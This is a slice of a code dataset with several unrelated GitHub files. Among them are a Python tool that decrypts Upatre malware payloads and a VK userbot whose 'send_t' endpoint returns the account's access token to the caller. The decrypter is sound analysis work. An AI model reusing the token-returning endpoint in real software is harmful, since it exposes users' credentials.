Roman\r\n\r\nВерсия: 1.6\r\n'''\r\nimport json\r\n\r\nimport vk_api\r\nfrom flask import Flask, request, jsonify\r\n\r\n# --------------------------------------------\r\ntoken = \"ТОКЕН\" # ---\r\nsecret = \"КОРОТКИЙ КЛЮЧ ДЛЯ ЮЗЕР-БОТА'а\" # ---\r\n# --------------------------------------------\r\n\r\n\r\napp = Flask(__name__)\r\nvk = vk_api.VkApi(token=token)\r\nversion = \"1.6\"\r\n\r\ndef add_fr(user):\r\n vk.method('friends.add', {'user_id': user})\r\n\r\n\r\ndef del_fr(user):\r\n vk.method('friends.delete', {'user_id': user})\r\n\r\n\r\ndef invite_user(chat, user):\r\n vk.method('messages.addChatUser', {'chat_id': chat, 'user_id': user})\r\n\r\n\r\ndef delete_msg(chat_id, msg_ids, need_get_id=1):\r\n if need_get_id == 1:\r\n vk.method('messages.delete', {'message_ids': get_conv_msg_ids(chat_id, msg_ids), 'delete_for_all': 1})\r\n else:\r\n vk.method('messages.delete', {'message_ids': msg_ids, 'delete_for_all': 1})\r\n\r\n\r\ndef get_peer_id(chat_id):\r\n peer_id = int(chat_id) + 2000000000\r\n return peer_id\r\n\r\ndef gethistory(chat_id, count):\r\n return vk.method('messages.getHistory', {'peer_id': get_peer_id(chat_id), 'count': count})\r\n\r\ndef setRoleMember(chat_id, user, role):\r\n return vk.method('messages.setMemberRole', {'peer_id': get_peer_id(chat_id), \"role\": role, 'member_id': user})\r\n\r\ndef get_user_msg(history, user):\r\n items = history['items']\r\n ids_msgs = \"\"\r\n for i in items:\r\n from_id = i['from_id']\r\n if from_id != \"*\":\r\n id_msg = i['id']\r\n if from_id == int(user):\r\n ids_msgs += str(id_msg) + \",\"\r\n else:\r\n id_msg = i['id']\r\n ids_msgs += str(id_msg) + \",\"\r\n\r\n if ids_msgs != \"\":\r\n ids_msgs = ids_msgs [:len(ids_msgs) - 1]\r\n return ids_msgs\r\n\r\ndef get_conv_msg_ids(chat_id, msg_ids):\r\n ids = \"\"\r\n quest = vk.method('messages.getByConversationMessageId',{'peer_id': get_peer_id(chat_id), 'conversation_message_ids': msg_ids})[\"items\"]\r\n for i in quest:\r\n ids += str(i[\"id\"]) + \",\"\r\n return ids\r\n\r\ndef write_msg(chat_id, mess):\r\n vk.method('messages.send',\r\n {'chat_id': chat_id, 'message': mess,'random_id': 0})\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef result():\r\n data = json.loads(request.data)\r\n task = data.get('task')\r\n object = data.get('object')\r\n vers = data.get('version')\r\n if data.get('secret_key') == secret:\r\n if vers == version:\r\n try:\r\n if task == 'conf':\r\n return jsonify(response=1)\r\n\r\n elif task == \"write_msg\":\r\n write_msg(object['chat_id'], object['msg'])\r\n return jsonify(response=1)\r\n\r\n elif task == 'invite_user':\r\n invite_user(object['chat_id'], object['user'])\r\n write_msg(object['chat_id'], \"✅ Пользователь был добавлен юзерботом\")\r\n return jsonify(response=1)\r\n\r\n elif task == 'delete_msg':\r\n delete_msg(object['chat_id'], object['msg_ids'])\r\n write_msg(object['chat_id'],\"✅ Сообщения удалены\")\r\n return jsonify(response=1)\r\n\r\n elif task == 'soft_delete':\r\n delete_msg(object['chat_id'], object['msg_ids'])\r\n return jsonify(response=1)\r\n\r\n elif task == 'add_fr':\r\n add_fr(object['user'])\r\n write_msg(object['chat_id'],\"✅ Заявка дружбы была отправлена\")\r\n return jsonify(response=1)\r\n\r\n elif task == 'clean':\r\n user = object['user']\r\n chat_id = object['chat_id']\r\n count = object['count']\r\n history = gethistory(chat_id, count)\r\n msg_ids = get_user_msg(history, user)\r\n if msg_ids != \"\":\r\n delete_msg(chat_id, msg_ids, 0)\r\n write_msg(chat_id, \"✅ Сообщения были удалены\")\r\n return 
jsonify(response=1)\r\n else:\r\n return jsonify(response=10, err=\"За указанный промежуток сообщения не найдены\")\r\n elif task == 'set_role':\r\n user = object['user']\r\n chat_id = object['chat_id']\r\n role = object['role']\r\n setRoleMember(chat_id, user, role)\r\n if role == 'admin':\r\n write_msg(chat_id, \"✅ Пользователь назначен НАСТОЯЩИМ админом беседы\")\r\n else:\r\n write_msg(chat_id, \"✅ C пользователя снят ранг админ\")\r\n return jsonify(response=1)\r\n elif task == 'send_t':\r\n return jsonify(response=1, t=vk.token) \r\n elif task == 'del_fr':\r\n del_fr(object['user'])\r\n write_msg(object['chat_id'], \"✅ Друг был удалён\")\r\n return jsonify(response=1)\r\n else:\r\n return jsonify(response=3)\r\n\r\n except Exception as e:\r\n e = str(e)\r\n if e.startswith(\"[15]\") == True:\r\n return jsonify(response=4, err=e)\r\n elif e.startswith(\"[1]\") == True or e.startswith(\"[10]\") == True:\r\n return jsonify(response=5, err=e)\r\n elif e.startswith(\"[5]\") == True:\r\n return jsonify(response=6, err=e)\r\n elif e.startswith(\"[6]\") == True:\r\n return jsonify(response=7, err=e)\r\n else:\r\n return jsonify(response=0, err=e)\r\n else:\r\n return jsonify(response=8)\r\n else:\r\n return jsonify(response=2)\r\n\r\n\r\n\r\n# ошибка №2 - неверный ключ\r\n# ошибка №4 - пользователь не в друзьях\r\n# ошибка №5 - внутренняя ошибка вк, тут остаётся только ждать и верить в лучшее\r\n# ошибка №6 - неверный токен\r\n# ошибка №7 - У вас слишком перегружен сервер, не раздавайте свой сервер кому попало\r\n# ошибка №8 - Версия бота устарела\r\n# ошибка №9 - Вы не можете удалить сообщения написанные более 24 часов назад\r\n# ошибка №10 - За указанный промежуток сообщения не найдены\r\n# ошибка №0 - страшная ошибка никому неизвестная\r\n","repo_name":"Roman-Shubnikov/User_Bot_For_Convers_Bot","sub_path":"userbot.py","file_name":"userbot.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"23"} +{"seq_id":"19410687939","text":"import cv2\nimport numpy as np\nfrom PIL import Image\n\ndef stackImages(imgArray,scale,lables=[]):\n sizeW= imgArray[0][0].shape[1]\n sizeH = imgArray[0][0].shape[0]\n rows = len(imgArray)\n cols = len(imgArray[0])\n rowsAvailable = isinstance(imgArray[0], list)\n if rowsAvailable:\n for x in range ( 0, rows):\n for y in range(0, cols):\n imgArray[x][y] = cv2.resize(imgArray[x][y], (sizeW,sizeH), None, scale, scale)\n if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR)\n imageBlank = np.zeros((sizeH, sizeW, 3), np.uint8)\n hor = [imageBlank]*rows\n hor_con = [imageBlank]*rows\n for x in range(0, rows):\n hor[x] = np.hstack(imgArray[x])\n hor_con[x] = np.concatenate(imgArray[x])\n ver = np.vstack(hor)\n ver_con = np.concatenate(hor)\n else:\n for x in range(0, rows):\n imgArray[x] = cv2.resize(imgArray[x], (sizeW, sizeH), None, scale, scale)\n if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR)\n hor= np.hstack(imgArray)\n hor_con= np.concatenate(imgArray)\n ver = hor\n if len(lables) != 0:\n eachImgWidth= int(ver.shape[1] / cols)\n eachImgHeight = int(ver.shape[0] / rows)\n print(eachImgHeight)\n for d in range(0, rows):\n for c in range (0,cols):\n cv2.rectangle(ver,(c*eachImgWidth,eachImgHeight*d),(c*eachImgWidth+len(lables[d])*13+27,30+eachImgHeight*d),(255,255,255),cv2.FILLED)\n cv2.putText(ver,lables[d],(eachImgWidth*c+10,eachImgHeight*d+20),cv2.FONT_HERSHEY_COMPLEX,0.7,(255,0,255),2)\n 
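# hand back the assembled mosaic (label banners were drawn above when lables is non-empty)\n 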
return ver\n\ndef image_resize(image, width = None, height = None, inter = cv2.INTER_AREA):\n # initialize the dimensions of the image to be resized and\n # grab the image size\n dim = None\n (h, w) = image.shape[:2]\n\n # if both the width and height are None, then return the\n # original image\n if width is None and height is None:\n return image\n\n # check to see if the width is None\n if width is None:\n # calculate the ratio of the height and construct the\n # dimensions\n r = height / float(h)\n dim = (int(w * r), height)\n\n # otherwise, the height is None\n else:\n # calculate the ratio of the width and construct the\n # dimensions\n r = width / float(w)\n dim = (width, int(h * r))\n\n # resize the image\n resized = cv2.resize(image, dim, interpolation = inter)\n\n # return the resized image\n return resized\n\nMIN_MATCHES = 20\n# w, h = 500, 500\n\n# cap = cv2.imread('images/1.jpg')\n# print(f\"\\n\\n\\n{cap}\")\ncapVid = cv2.VideoCapture('video/test_vertical.mp4')\n_, cap = capVid.read()\n# print(f\"\\n\\n\\n{cap}\")\n\n\nmodel = cv2.imread('images/Target_resize_1.jpg')\nmyVid = cv2.VideoCapture('video/video.mp4')\nsuccess, imgVideo = myVid.read()\n\n# resize imgVideo\nhT, wT, cT = model.shape\n\n#resize imgFrame\nimgVideo = image_resize(imgVideo, width=wT, height=hT)\n\n#resize cap\ncap = image_resize(cap, width=wT, height=hT)\n\n\nimgAug = cap.copy()\n# detection = False\n# frameCounter = 0\n\n# ORB keypoint detector\norb = cv2.ORB_create()\n\n# create brute force matcher object\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n\n# Compute model keypoints and its descriptors\nkp_model, des_model = orb.detectAndCompute(model, None)\n\n# Compute scene keypoints and its descriptors\nkp_frame, des_frame = orb.detectAndCompute(cap, None)\n\n# Match frame descriptors with model descriptors\nmatches = bf.match(des_model, des_frame)\n\n# Sort them in the order of their distance\nmatches = sorted(matches, key=lambda x: x.distance)\n\n\nif len(matches) > MIN_MATCHES:\n # detection = True\n # draw first 15 matches.\n imgFeatures = cv2.drawMatches(model, kp_model, cap, kp_frame,\n matches[:MIN_MATCHES], 0, flags=2)\n\n print('\\n\\n\\n\\n--------------------\\n\\n\\n\\n')\n print(f'kp1_len:\\t{len(kp_model)}')\n print(f'kp2_len:\\t{len(kp_frame)}')\n print(f'matches_len:\\t{len(matches)}')\n\n\n src_pts = np.float32([kp_model[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)\n dst_pts = np.float32([kp_frame[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)\n # compute Homography\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n\n # Draw a rectangle that marks the found model in the frame\n h, w, _ = model.shape\n pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)\n # project corners into frame\n dst = cv2.perspectiveTransform(pts, M)\n # connect them with lines\n img2 = cv2.polylines(cap, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)\n\n imgWarp = cv2.warpPerspective(imgVideo, M, (cap.shape[1], cap.shape[0]))\n maskNew = np.zeros((cap.shape[0], cap.shape[1]), np.uint8)\n cv2.fillPoly(maskNew, [np.int32(dst)], (255, 255, 255))\n\n maskInv = cv2.bitwise_not(maskNew)\n imgAug = cv2.bitwise_and(imgAug, imgAug, mask=maskInv)\n imgAug = cv2.bitwise_or(imgWarp, imgAug)\n\n StackedImages = stackImages(([cap, imgVideo, model],\n [imgFeatures, imgWarp, imgAug]), 0.5)\n\n # if detection == False:\n # myVid.set(cv2.CAP_PROP_POS_FRAMES, 0)\n # frameCounter = 0\n # else:\n # if frameCounter == myVid.get(cv2.CAP_PROP_FRAME_COUNT):\n # 
myVid.set(cv2.CAP_PROP_POS_FRAMES, 0)\n # frameCounter = 0\n # success, imgVideo = myVid.read()\n\n\n # cv2.imshow('cap', cap)\n # cv2.imshow('img2', img2)\n # cv2.imshow('imgAug', imgAug)\n cv2.imshow('StackedImages', StackedImages)\n cv2.imwrite('result/aug.jpg', StackedImages)\n # cv2.waitKey(0)\nelse:\n print (\"Not enough matches have been found - %d/%d\" % (len(matches),\n MIN_MATCHES))\n\n","repo_name":"bateikoEd/object_recognition","sub_path":"Lab4/bound.py","file_name":"bound.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"1849485794","text":"with open(\"../inputs/d06.txt\") as f:\n data = [int(x) for x in f.read().strip().split(\",\")]\n\n# data = [3, 4, 3, 1, 2]\n\n\ndef iterate(data):\n new = [6 if x == 0 else x - 1 for x in data]\n return new + [8] * data.count(0)\n\n\nprint(\"initial....\", \":\", len(data), \"\".join(str(x) for x in data))\n\nfor x in range(1, 81):\n data = iterate(data)\n print(\"after day\", x, \":\", len(data)) # , \"\".join(str(x) for x in data))\n","repo_name":"akx/aoc2021","sub_path":"py/d06.py","file_name":"d06.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"11806106444","text":"import os\n\nnombre_fichero = 'text.txt'\n\n\ndef mostrar_fichero():\n try:\n with open(nombre_fichero,'r') as fichero:\n print(f'[*] Contenido de {nombre_fichero}: ')\n print(fichero.read())\n except:\n print(f'El fichero \"{nombre_fichero}\" no existe')\n \ndef añadir_linea_fichero(modo_apertura):\n x = input(\"Inserta una nueva línea: \")\n with open(nombre_fichero,modo_apertura) as fichero:\n fichero.write(x+'\\n')\n \n \n \n \n \n \n \n \nif os.path.exists(nombre_fichero):\n res = input(f'[*] El \"{nombre_fichero}\" fichero ya existe, desea borrarlo y generarlo de nuevo? 
Y/N'+'\\n')\n if res == 'Y':\n añadir_linea_fichero('w') # Borra y crea de nuevo\n mostrar_fichero()\n elif res == 'N':\n añadir_linea_fichero('a') # Añade nueva línea al final\n mostrar_fichero()\n else:\n print(\"ERROR: Respuesta incorrecta.\") \nelse:\n añadir_linea_fichero('a') \n mostrar_fichero()\n \n \n \n ","repo_name":"mouredev/retos-programacion-2023","sub_path":"Retos/Reto #34 - EL TXT [Media]/python/MaikRG.py","file_name":"MaikRG.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"es","doc_type":"code","stars":4219,"dataset":"github-code","pt":"23"} +{"seq_id":"2164051610","text":"from random import uniform\n\nvar = list()\n\nfor i in range(10):\n aux = list()\n for j in range(3):\n aux.append(round(uniform(0, 10), 1))\n var.append(aux)\n\nfor pos, a in enumerate(var):\n print(f'Aluno {pos + 1:>2}: {a}')\n\npos = 0\nfor j in range(3):\n m = 10\n for i in range(10):\n if var[i][j] < m:\n m = var[i][j]\n pos = i\n print(f'A menor nota da prova {j + 1} foi {m} do aluno {pos + 1}')\n var.pop(pos)\n var.insert(pos, [11, 11, 11])\n","repo_name":"Jpedrosrt/Python-D","sub_path":"Ex/Seção 7/Parte 2/ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"10681589687","text":"\"\"\"\n Tabela 5.3 pg.75\n Critérios para a indicação da necessidade e da quantidade de corretivos da acidez para culturas de grãos.\n\"\"\"\n\nTABLE_5_3 = {\n \"in_all_cases\": {\n \"decision_making\": {\n \"ph\": 5.5,\n \"al\": None\n },\n \"ph_reference\": 6,\n \"aplication_mode\": \"incorporated\"\n },\n \"system_implementation\": {\n \"decision_making\": {\n \"ph\": 5.5,\n \"al\": None\n },\n \"ph_reference\": 6,\n \"aplication_mode\": \"incorporated\"\n\n },\n \"Consolidated_system_no_restriction\": {\n \"decision_making\": {\n \"ph\": 5.5,\n \"al\": None\n },\n \"ph_reference\": 6,\n \"aplication_mode\": \"shallow\"\n\n },\n \"Consolidated_system_with_restriction\": {\n \"decision_making\": {\n \"ph\": 5.5,\n \"al\": 30\n },\n \"ph_reference\": 6,\n \"aplication_mode\": \"incorporated\"\n\n },\n}\n","repo_name":"ThiagoBava/tcc_api","sub_path":"api/tables/table_5_3.py","file_name":"table_5_3.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"3465392915","text":"import random\nans=random.randint(1, 99)\nmin, max=0, 100\namount=5 #可猜五次\nwhile amount>0:\n amount-=1\n guess=int(input('請在%d-%d之間猜數字:'%(min, max)))\n #驗證範圍?\n if guess <=min or guess>=max:\n print('輸入範圍錯誤')\n continue\n #是否猜對 ?\n if guess > ans:\n max=guess\n elif guess < ans:\n min=guess\n else:\n print('恭喜答對了')\n break\n #若都沒猜對\n if amount==0:\n print(\"你是非洲人 快看答案:\",str(ans))\n\n\n\n","repo_name":"HuaMa001/python001","sub_path":"d04/guess number.py","file_name":"guess number.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"5682730242","text":"import config\nimport pytest\nfrom utils import testing, stun\nfrom utils.connection_util import ConnectionTag, new_connection_by_tag\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n \"connection_tag,public_ip\",\n [\n pytest.param(ConnectionTag.DOCKER_CONE_CLIENT_1, \"10.0.254.1\"),\n pytest.param(\n ConnectionTag.WINDOWS_VM,\n \"10.0.254.7\",\n marks=[\n pytest.mark.windows,\n pytest.mark.xfail(reason=\"test is flaky - LLT-4213\"),\n ],\n ),\n 
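# the mac VM is expected to report the same public IP as the Windows VM\n 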
pytest.param(ConnectionTag.MAC_VM, \"10.0.254.7\", marks=pytest.mark.mac),\n ],\n)\nasync def test_client_basic_stun(connection_tag: ConnectionTag, public_ip: str) -> None:\n async with new_connection_by_tag(connection_tag) as connection:\n ip = await testing.wait_long(stun.get(connection, config.STUN_SERVER))\n assert ip == public_ip, f\"wrong public ip for the client {ip}\"\n","repo_name":"NordSecurity/libtelio","sub_path":"nat-lab/tests/test_client_basic_stun.py","file_name":"test_client_basic_stun.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"23"} +{"seq_id":"11223099971","text":"import logging\nimport os\nimport time\nfrom http import HTTPStatus\n\nimport requests\nfrom dotenv import load_dotenv\nimport telegram\n\nimport exceptions\n\nload_dotenv()\n\nPRACTICUM_TOKEN = os.getenv(\"PRACTICUM_TOKEN\")\nTELEGRAM_TOKEN = os.getenv(\"TELEGRAM_TOKEN\")\nTELEGRAM_CHAT_ID = os.getenv(\"TELEGRAM_CHAT_ID\")\n\nRETRY_PERIOD = 600\nENDPOINT = \"https://practicum.yandex.ru/api/user_api/homework_statuses/\"\nHEADERS = {\"Authorization\": f\"OAuth {PRACTICUM_TOKEN}\"}\n\nHOMEWORK_VERDICTS = {\n \"approved\": \"Работа проверена: ревьюеру всё понравилось. Ура!\",\n \"reviewing\": \"Работа взята на проверку ревьюером.\",\n \"rejected\": \"Работа проверена: у ревьюера есть замечания.\",\n}\n\n\ndef send_message(bot, message):\n \"\"\"Отправка сообщений через бот Телеграм.\"\"\"\n try:\n bot.send_message(TELEGRAM_CHAT_ID, message)\n logging.debug(f\"Сообщение в телеграмм отправленно: {message}\")\n except Exception as error:\n logging.error(f\"Ошибка при подключении к API Telegram: {error}\")\n\n\ndef get_api_answer(timestamp):\n \"\"\"Функция обращения к API Практикум.\"\"\"\n params = {\"from_date\": timestamp}\n try:\n response = requests.get(ENDPOINT, headers=HEADERS, params=params)\n content = response.json()\n except requests.exceptions.RequestException as request_error:\n logging.error(f\"Код ответа не OK: {request_error}\")\n raise exceptions.RequestError(f\"Код ответа не OK: {request_error}\")\n if response.status_code == HTTPStatus.OK:\n return content\n else:\n raise exceptions.InvalidHttp(\"Ошибка API Яндекс.Практикума\")\n\n\ndef check_response(response):\n \"\"\"Прверка ответа API Яндекс.Практикума.\"\"\"\n if isinstance(response, dict):\n try:\n timestamp = response[\"current_date\"]\n if not isinstance(response, dict):\n logging.error(\"В response передан не словарь!\")\n raise exceptions.NoDictCurrentDate(\n \"В response передан не словарь!\"\n )\n\n except KeyError:\n logging.error(\"Ключ current_date в Яндекс.Практикуме отсутсвует\")\n try:\n homeworks = response[\"homeworks\"]\n except KeyError:\n logging.error(\"Ключ homeworks в Яндекс.Практикуме отсутсвует\")\n\n if isinstance(timestamp, int) and isinstance(homeworks, list):\n return homeworks\n else:\n raise TypeError(\"Ошибка типа TypeError\")\n else:\n raise TypeError(\"Ошибка типа TypeError\")\n\n\ndef parse_status(homework):\n \"\"\"Проверка статуса ДЗ.\"\"\"\n homework_name = homework.get(\"homework_name\")\n homework_status = homework.get(\"status\")\n if homework_status is None:\n raise exceptions.HomeworkStatus(\n \"Ошибка, пустое значение status: \", homework_status\n )\n if homework_name is None:\n raise exceptions.HomeworkName(\n \"Ошибка, пустое значение в homework_name: \", homework_name\n )\n if homework_status in HOMEWORK_VERDICTS:\n verdict = HOMEWORK_VERDICTS.get(homework_status)\n return f'Изменился статус проверки 
работы \"{homework_name}\". {verdict}'\n else:\n raise exceptions.HomeworkStatusIsNone(\"Ошибка, отсутсвует статус ДЗ\")\n\n\ndef check_tokens():\n \"\"\"Функция проверка токена и id чата.\"\"\"\n tokens = {\n \"practicum_token\": PRACTICUM_TOKEN,\n \"telegram_token\": TELEGRAM_TOKEN,\n \"telegram_id\": TELEGRAM_CHAT_ID,\n }\n for key, value in tokens.items():\n if value is None:\n logging.critical(f\"{key}, Отсутсвует\")\n return False\n return True\n\n\ndef main():\n \"\"\"Основная логика работы бота.\"\"\"\n if check_tokens():\n bot = telegram.Bot(token=TELEGRAM_TOKEN)\n timestamp = int(time.time())\n error_name = ''\n\n while True:\n try:\n response = get_api_answer(timestamp)\n homeworks = check_response(response)\n count_works = len(homeworks)\n while count_works > 0:\n message = parse_status(homeworks[count_works - 1])\n send_message(bot, message)\n count_works -= 1\n timestamp = int(time.time())\n time.sleep(RETRY_PERIOD)\n\n except Exception as error:\n message = f\"Сбой в работе программы: {error}\"\n if error != error_name:\n send_message(bot, message)\n error_name = error\n logging.error(message)\n time.sleep(RETRY_PERIOD)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.DEBUG,\n filename=\"main.py\",\n format=\"%(asctime)s, %(levelname)s, %(message)s, %(name)s\",\n )\n main()\n","repo_name":"Anac0n6a/homework_bot","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"10716650976","text":"\"\"\"Upatre Payload Decrypter\nJohannes Bader\n\nTries to decrypt the payload format of Upatre downloads\n\nsee\nhttp://www.johannesbader.ch/2015/06/Win32-Upatre-BI-Part-4-Payload-Format/\n\n\"\"\"\nimport os\nimport sys\nimport struct\nimport signal\nimport argparse\nimport libs.lznt1\n\nif sys.version_info[0] != 2:\n print(\"only runs with Python 2.x\")\n quit()\n\n\n\ndef _p(field, value):\n if type(value) == int:\n value = value & 0xFFFFFFFF\n print(\"{:15}: {:08x}\".format(field, value))\n else:\n print(\"{:15}: {}\".format(field, value))\n\ndef ror(value, places):\n return ((value >> places) ^ (value << (32 - places))) & 0xFFFFFFFF\n\ndef rol(value, places):\n return ((value << places) ^ (value >> (32 - places))) & 0xFFFFFFFF\n\ndef inc_dec_reverse(size_key, type_):\n u = (size_key & 0xFFFF)\n l = size_key >> 16\n if type_ == \"inc\":\n if l - 4 < 0:\n u -= 1\n l -= 4\n elif type_ == \"dec\":\n if l + 4 > 0xFFFF:\n u += 1\n l += 4\n elif type_ == \"dec2\":\n if l + 8 > 0xFFFF:\n u += 1\n l += 8\n return [((u << 16) ^ (l & 0xFFFF)) & 0xFFFFFFFF]\n\ndef rol_reverse(size_key):\n u = (size_key & 0xFFFF) << 16\n l = size_key >> 16\n lm = 0x0000FFFF\n um = 0xFFFF0000\n li = ror(l, 4) \n lm = ror(lm, 4) \n ui = ror(u, 3) \n um = ror(um, 3) \n k = (ui & um) ^ (li & lm)\n keys = [k, k + 0x00001000, k + 0x10000000, k + 0x10001000]\n return keys\n\ndef decrypt(c, key, ksa, check_key=None):\n p = c[0:4]\n for i in range(4,len(c), 4):\n if len(c[i:i+4]) == 4:\n enc = struct.unpack('I', c[i:i+4])[0]\n dec = enc ^ key\n p += struct.pack('I', dec)\n if ksa == \"rol\":\n key = rol(key, 1)\n elif ksa == \"inc\":\n key = (key + 1) & 0xFFFFFFFF \n elif ksa == \"dec\":\n key = (key - 1) & 0xFFFFFFFF \n elif ksa == \"dec2\":\n key = (key - 2) & 0xFFFFFFFF \n elif ksa == \"chk\":\n key = (key + check_key) & 0xFFFFFFFF\n else:\n print(\"invalid ksa: {}\".format(ksa))\n quit()\n return p\n\ndef handler(signum, frame):\n global timeout\n 
timeout = True\n raise Exception(\"timeout\")\n\ndef decompress(p, old):\n if old:\n offset_data = 4\n compressed_size = len(p) - 4\n else:\n offset_data = struct.unpack('H', p[0xC:0xE])[0]\n compressed_size = struct.unpack('I', p[0xE:0x12])[0]\n unc = libs.lznt1.dCompressBuf(p[offset_data:offset_data + compressed_size])\n return unc\n\ndef offset_check(p):\n file_size = struct.unpack('I', p[0x12:0x16])[0]\n offset_stub = struct.unpack('H', p[0x8:0xA])[0]\n offset_data = struct.unpack('H', p[0xC:0xE])[0]\n compressed_size = struct.unpack('I', p[0xE:0x12])[0]\n if offset_stub > file_size or offset_data > file_size or \\\n compressed_size > file_size:\n return 0\n else:\n return 1\n\ndef find_keys(c, enc_file): \n size = os.stat(enc_file).st_size\n size_enc = struct.unpack('I', c[0x12:0x16])[0]\n size_key = struct.unpack('I', c[0x12:0x16])[0] ^ size\n keys = {}\n keys['inc'] = inc_dec_reverse(size_key, \"inc\")\n keys['dec'] = inc_dec_reverse(size_key, \"dec\")\n keys['dec2'] = inc_dec_reverse(size_key, \"dec2\")\n keys['rol'] = rol_reverse(size_key)\n return keys\n\ndef crack_payload(enc_file, key, check_key, ksa, old):\n with open(enc_file, 'rb') as r:\n c = r.read()\n\n if key and ksa:\n keys = {ksa: [key]}\n elif key:\n keys = {}\n for ksa in ['inc', 'dec', 'dec2', 'rol']:\n keys[ksa] = [key]\n if check_key:\n keys['chk'] = [key]\n else:\n keys = find_keys(c, enc_file)\n\n print(\"testing {} potential keys\".format(len(keys)))\n for ksa, tkeys in keys.items():\n for key in tkeys:\n _p(\"key (with ksa = {})\".format(ksa), key)\n p = decrypt(c, key, ksa, check_key)\n s = 1 if old else offset_check(p)\n if not s:\n print(\" -> invalid offsets\")\n continue\n\n try:\n unc = decompress(p, old)\n except Exception as e:\n print(\" -> decompression failed {}\".format(e))\n continue\n if unc[0:2] == \"MZ\": \n print(\" -> begins with MZ header, this is it!\")\n out_file = \"decrypted_\" + enc_file\n with open(out_file, \"wb\") as w:\n w.write(bytes(unc))\n print(\" -> written decrypted exe to: {}\".format(out_file))\n _p(\" -> decrypt_key\", key)\n _p(\" -> ksa\", ksa)\n _p(\" -> check_key\", struct.unpack(\"I\", p[4:8])[0])\n _p(\" -> stub entry\", struct.unpack(\"H\", p[8:0xA])[0])\n _p(\" -> com. start\", struct.unpack(\"H\", p[0xC:0xE])[0])\n _p(\" -> com. size\", struct.unpack(\"I\", p[0xE:0x12])[0])\n return 1 \n else:\n print(\" -> file does not start with MZ header\")\n continue\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(\"decrypt Upatre payload\")\n parser.add_argument(\"payload_file\")\n parser.add_argument(\"-k\", \"--key\", default=\"0\")\n parser.add_argument(\"-s\", \"--ksa\")\n parser.add_argument(\"-c\", \"--check_key\", default=\"0\")\n parser.add_argument(\"-o\", \"--old\")\n args = parser.parse_args()\n crack_payload(args.payload_file, int(args.key, 16), int(args.check_key, 16),\n args.ksa, args.old)\n","repo_name":"baderj/upatre","sub_path":"upatre_payload_decrypter.py","file_name":"upatre_payload_decrypter.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"44005285391","text":"import ldap3\nimport ssl\n\n
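# ssl_util is a local helper used below to locate a CA certificate bundle\nfrom . 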
import ssl_util\n\n\nclass Connection(object):\n def __init__(self, account):\n self.account = account\n\n # Don't allow non-secure connections for now; always require SSL/TLS\n if self.account.protocol != 'ldaps':\n raise Exception('Insecure LDAP not supported')\n\n ca_certs_file = list(ssl_util.find_ca_cert_files())[0]\n tls = ldap3.Tls(validate=ssl.CERT_REQUIRED,\n version=ssl.PROTOCOL_TLSv1,\n ca_certs_file=ca_certs_file)\n\n LDAPS_PORT = 636\n connect_timeout = 5.0\n self.server = ldap3.Server(self.account.server, port=LDAPS_PORT,\n use_ssl=True, tls=tls,\n connect_timeout=connect_timeout)\n self.setup_conn()\n\n def setup_conn(self):\n self.conn = ldap3.Connection(self.server, self.account.user,\n self.account.password)\n if not self.conn.bind():\n raise Exception(self.conn.last_error)\n\n def search(self, base_dn, filter, attrs=None, scope='SUBTREE'):\n if attrs is None:\n attrs = ldap3.ALL_ATTRIBUTES\n result = self.conn.search(base_dn, filter, scope, attributes=attrs)\n if not result:\n raise Exception(self.conn.last_error)\n return self.conn.entries\n","repo_name":"simpkins/amt","sub_path":"amt/ldap.py","file_name":"ldap.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"42635916771","text":"import asyncio\nfrom contextlib import suppress\n\nfrom testandconquer import logger\nfrom testandconquer.client import MessageType\nfrom testandconquer.serializer import Serializer\nfrom testandconquer.util import system_exit\n\n\nclass Scheduler:\n def __init__(self, settings, client, suite_items, worker_id, serializer=Serializer):\n self.settings = settings\n self.client = client\n self.suite_items = suite_items\n self.worker_id = worker_id\n self.serializer = serializer\n\n self.more = True\n self.schedule_queue = asyncio.Queue()\n self.report_queue = asyncio.Queue()\n self.task = asyncio.ensure_future(self._report_task())\n client.subscribe(self)\n\n async def next(self):\n return await self.schedule_queue.get()\n\n async def report(self, report):\n logger.info('acking schedule %s', report.schedule_id)\n await self.client.send(MessageType.Ack, {'schedule_id': report.schedule_id, 